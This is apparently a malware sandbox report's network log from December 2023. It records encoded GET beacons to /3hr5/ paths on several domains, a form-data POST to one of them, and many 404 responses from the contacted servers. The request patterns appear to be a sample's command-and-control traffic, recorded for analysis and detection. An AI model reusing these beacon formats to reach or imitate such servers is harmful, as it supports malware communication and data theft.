        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.littlehappiez.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=cybVuDtLHKDYoAC8BtRtsfHHNdqM0/3VmZgYz4alBfxy2AFWbwCj5N7XVIo5x4xVvDhkEXfU/TSdDvvPnMbZ8BO8VTwNCq9LYQ==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.engindenizyurdu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.opleverdossier.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=W8hj+ZAnfVNXO/00LhML7TvkVgnbLHvZg2EZ4Jo9WuG5xJWbZ5L5hN7sKdMlw1DL3P6Y0UBuLzf410vX+kFx4V+xT/ik7P0KhQ==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.fisiocomoterapia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: unknown DNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /3hr5/ HTTP/1.1Host: www.homesteadmath.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.homesteadmath.comReferer: http://www.homesteadmath.com/3hr5/Connection: closeContent-Length: 184Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:22:51 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:22:53 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:22:56 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 04 Dec 2023 14:22:59 GMTServer: ApacheData Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.14.2date: Mon, 04 Dec 2023 14:23:12 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedx-request-id: 958a918b-9862-4cf0-b51a-9d975ac6c37dx-runtime: 0.027786content-encoding: gzipconnection: closeData Raw: 31 33 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6d 53 db c6 b7 7f 9f 4f b1 7f 33 b7 36 0d 96 1f 08 04 08 a6 e3 82 21 b4 09 e4 1a 27 4d 9b c9 b8 b2 b5 b6 55 64 c9 95 64 0c e9 ed 77 bf bf 73 76 57 5a d9 40 28 f4 be b8 33 09 93 46 48 bb e7 f9 69 77 cf 76 ff 3f 47 e7 87 bd 5f df 75 c4 24 9d 06 07 cf f6 e9 1f 11 b8 e1 b8 55 92 61 89 5e 48 d7 3b 78 26 c4 fe 54 a6 ae 18 4e dc 38 91 69 ab 34 4f 47 d5 9d 92 a8 f1 a7 d4 4f 03 79 d0 1e a6 7e 14 8a c3 28 4c e3 28 08 64 bc 27 3a d7 43 39 e3 b7 43 77 3e 9e a4 fb 35 35 94 26 25 e9 0d 26 e1 49 88 41 e4 dd 88 bf f8 11 bf b8 c3 cb 71 1c cd 43 af 3a 8c 82 08 50 d6 8e db f4 f3 4a 0f 30 6f 37 37 37 cd ab a9 1b 8f fd 70 4f d4 67 d7 ea d5 df cf 32 c0 1b 62 b6 21 a2 60 43 cc f1 37 f5 32 3c 23 d0 59 1d b9 53 3f b8 d9 13 13 19 5c c9 d4 1f ba 1b e2 4a c6 9e 1b e2 c1 8d 7d 17 53 12 37 4c aa 89 8c fd 91 c1 c6 33 13 ff 8b dc 03 b9 8d 4d 83 53 88 c0 0f 65 75 22 7d 70 ba 27 1a 3b 4b c4 cc 62 59 44 ae 40 34 1a 39 80 c5 c4 4f 65 35 99 b9 43 c0 c6 f8 ea 22 76 67 05 8e f0 d2 19 44 d7 b9 b4 a2 d8 23 49 03 88 48 a2 c0 f7 c4 5a a7 d3 31 94 ce 5c cf f3 c3 31 3e 67 92 11 62 45 58 42 2c 7c 2f 9d ec 89 dd ad 65 9a 49 fb 32 ce b0 65 0a a9 1f e3 c7 60 c9 35 06 5d 1d 6e 35 8f 9b 2f 56 08 a8 3b 5b 72 2a 1a f4 df 02 3f 93 46 06 3c a3 cb 69 62 68 06 bd 28 54 a7 61 00 08 61 e9 01 33 8a 60 9b 2b 34 17 09 2b 40 6d 6e 2d a9 ca f1 60 ec 7e 90 dc 27 e6 a3 3a fd 64 32 60 3d 54 63 d7 f3 e7 c9 9e 78 91 eb d4 b0 05 c2 73 fb 14 c2 f3 93 59 e0 c2 f4 06 41 34 bc 34 60 8c 22 5e 2e 2b c2 49 e6 53 40 ca dd 24 53 2d 46 8a 46 c6 00 39 13 53 32 88 d2 34 9a 16 0c a3 48 f1 6d 04 68 b7 c9 d8 b7 4d d6 f0 b1 82 6a 4f 84 51 28 0b e2 5f 1b c2 45 5c 78 43 6e 3a 30 5a f2 19 b6 
c6 8c 44 ed ad 99 01 36 ea f5 ff 5a 35 9d 5b cc c6 49 a2 79 3c 94 e2 fb 55 eb c9 25 9f 89 68 39 2c 98 d9 7f 99 90 b3 ea 44 47 bb f4 93 69 37 8b 49 b0 f0 ce 21 fd 3c 40 63 8a 44 5b 86 05 7f b4 ad 41 49 e4 16 49 1a 52 1d cf 45 f8 35 04 5b 96 bf 93 4b 2c 42 e8 1a 05 d1 62 4f b8 f3 34 5a a5 3d 8f a7 c7 c7 05 75 39 7e 38 8a 32 e0 b9 d8 56 bc b5 48 8d 43 4e d4 0f e7 d3 81 8c 2d 57 59 8d df 45 89 99 20 d2 6e 67 21 3d 97 0b 9c 24 c7 9a 19 73 ac 43 6a 1e e4 8e 8e 8e 0c 83 a9 bc 4e ab 6e e0 8f 91 00 78 60 91 37 22 72 99 b7 6a 20 47 14 a2 ad a8 b8 1c 7a 57 81 ec 4d 48 c0 79 48 58 e5 f3 78 9b 7e 56 67 3a 2e 52 e3 55 4e c5 6d 29 ee f8 10 7f 8a 53 27 be e7 c9 30 43 98 39 ec 8a bb c1 30 84 91 ea ee 4e 7d b7 be f5 4a fc cd b6 ed ee 5d f9 09 72 0a d2 5e 36 62 7b 7b 3b fb ec a4 31 72 4d 75 14 bb 53 09 15 de 3a c6 f0 9d 7d d4 91 d4 a0 28 c0 70 12 19 c8 61 11 a1 1a 8f e1 da dd d6 90 dd 53 d9 4f dd 41 60 64 92 c5 7e 25 01 1d 20 c0 53 e0 ce 12 e4 42 f3 44 9f 19 4e 01 46 4a 69 4a a4 46 37 4b 11 b0 99 5b 8d e7 79 f7 43 40 6e a5 b0 a9 65 be 04 c8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | server: nginx/1.14.2 | date: Mon, 04 Dec 2023 14:23:15 GMT | content-type: text/html; charset=UTF-8 | transfer-encoding: chunked | x-request-id: e9de628b-bce2-4ae6-911c-2a6ac0d4a849 | x-runtime: 0.047968 | content-encoding: gzip | connection: close
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:23:40 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 6505 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:23:43 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 6505 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:23:45 GMT | Server: Apache | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 6505 | Content-Type: text/html; charset=UTF-8
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:23:53 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:23:56 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:23:59 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:24:02 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 708 | date: Mon, 04 Dec 2023 14:24:07 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 708 | date: Mon, 04 Dec 2023 14:24:10 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 708 | date: Mon, 04 Dec 2023 14:24:13 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 708 | date: Mon, 04 Dec 2023 14:24:15 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:25:16 GMT | Content-Length: 0 | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yaMdYCaxsyZm%2BnnAGn6wfAMsDFbhqsAoKuIfYOfyEWAXxjIdIanL7Ywvo9cGfgjdZgEr83rPGSWI85aZJRtn65zhEdNCeb0nvbdLts3ZwWMGSR2YnJopP7VySZC3m%2BohyXX1hc0%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8304b7bdec98184d-EWR | alt-svc: h3=":443"; ma=86400
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 04 Dec 2023 14:25:19 GMT | Content-Length: 0 | Connection: close | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5d6r45Ffvzt9P8HWlmwvEiooOeXO0Bmjl4dolBIJ1nQ7XIw80U37rp1DCtzwQqm3U7DjQ656seVmLtR2zuQPdCoaaOUXtgajPNbONyNKRpdzHV10aNp3yCmmSdbNeh9%2BdNARF3M%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8304b7ce4cfc0f5d-EWR | alt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:25:22 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4owVqgp4XXDIlLhwBxX3ocWU05AF%2FfcjPOtOwS9OAYll5T8jVYxdDqhsb7E29wVxuEpnx17a1DS4CU6aPHAHzl1mEiTzSumNtG5fJ%2FcXvcAW215vAMWJxckblqA2fhich1sMFGU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8304b7dea89d443e-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:25:24 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z%2FJ6TUxCea8%2BkhOSeci%2B8ljZDO2SEyta3VRoXa6V21cu82KDheHdgFDGwY%2BuNoejpA%2BwCgiWnjHzdDaCV%2BP5USI1O26Rb6HxI3vg7UMSQN9WNipGkjLrI1dYcMMquAe8lUWDcvk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8304b7ef1db74390-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:26:15 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:26:18 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 04 Dec 2023 14:26:20 GMTServer: ApacheContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 04 Dec 2023 14:26:23 GMTServer: Apache
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.14.2date: Mon, 04 Dec 2023 14:26:37 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedx-request-id: a3913f17-101e-49c4-83a6-652cbf43d254x-runtime: 0.026389content-encoding: gzipconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.14.2date: Mon, 04 Dec 2023 14:26:39 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedx-request-id: cae8a3a7-a00a-4264-a8e5-fb60ddfc94fax-runtime: 0.028912content-encoding: gzipconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.14.2date: Mon, 04 Dec 2023 14:26:42 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedx-request-id: 0aeccb4e-37de-409d-8546-ac85cb27f1ddx-runtime: 0.025843content-encoding: gzipconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:03 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 6505Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 6505Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 6505Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Mon, 04 Dec 2023 14:27:30 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Mon, 04 Dec 2023 14:27:33 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Mon, 04 Dec 2023 14:27:36 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Mon, 04 Dec 2023 14:27:39 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 04 Dec 2023 14:27:58 GMT Server: Apache Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 04 Dec 2023 14:28:01 GMT Server: Apache Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 04 Dec 2023 14:28:03 GMT Server: Apache Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Mon, 04 Dec 2023 14:28:06 GMT Server: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 14:28:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 293 X-Sorting-Hat-ShopId: 83935199526 Vary: Accept-Encoding X-Frame-Options: DENY X-ShopId: 83935199526 X-ShardId: 293 Content-Language: en-US Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:12 GMT; SameSite=Lax Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:12 GMT; SameSite=Lax Set-Cookie: _shopify_y=7e9a8744-5900-4053-b9f4-3d92c1cb1401; Expires=Tue, 03-Dec-24 14:28:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax Set-Cookie: _shopify_s=848dc933-1a65-49de-9c6f-80044a2f9b06; Expires=Mon, 04-Dec-23 14:58:12 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax Server-Timing: processing;dur=189 X-Shopify-Stage: production Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=18b0d218-e0c6-421 Data Raw: Data Ascii:
